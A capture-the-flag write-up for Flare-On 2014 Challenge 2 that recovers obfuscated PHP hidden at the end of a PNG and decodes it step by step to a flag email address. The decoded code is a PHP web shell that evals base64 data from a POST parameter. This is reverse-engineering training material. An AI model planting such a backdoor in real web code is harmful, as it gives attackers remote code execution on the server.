Flare On 2014 - Challenge 2 Writeup

Let's continue with the second challenge; this time it isn't a binary but a HTML file and an image.

If you open the PNG with a hex-editor you can see some PHP-Code at the bottom:

920b7308078ae13274cc4f6bfcfbd7c8.png

The extracted code (abbreviated):

 0<?php $terms = [
 1    "M",
 2    "Z",
 3    "]",
 4[...]
 5    "|",
 6];
 7$order = [
 8    59,
 9    71,
10    73,
11    13,
12[...]
13    47,
14];
15$do_me = "";
16for ($i = 0; $i < count($order); $i++) {
17    $do_me = $do_me . $terms[$order[$i]];
18}
19eval($do_me); ?>
20

I converted the code to Python in order to debug and work with it more easily:

0[...]
1do_me = "";
2
3for i in range(len(order)):
4    do_me = do_me + terms[order[i]]
5
6print(do_me)

Output:

0$_= 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOT[...]x4NkQiXSkpOyB9';
1$__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';
2$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
3eval($___($__));

Finally, time for some deobfuscation!

The first string ($_) and the second ($__) are both base64 encoded:

First one:

0if(isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"])) 
1{ 
2	eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"])); 
3}

Second one:

0$code=base64_decode($_);
1eval($code);

The string \97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D looked like a mixture of decimal and hexadecimal.

First, I removed all the slashes and then converted the hexadecimal values to decimal (e.g. 0x64 to 100).

Result:

97 49 49 68 79 84 116 104 97 116 68 79 84 106 97 118 97 53 99 114 97 112 65 84 102 108 97 114 101 68 65 83 72 111 110 68 79 84 99 111 109

Finally, I threw this sequence of numbers into the From Decimal recipe from CyberChef.

Result:

a11DOTthatDOTjava5crapATflareDASHonDOTcomD

Or, put in the right format:

[email protected]


Challenge 1 Challenge 3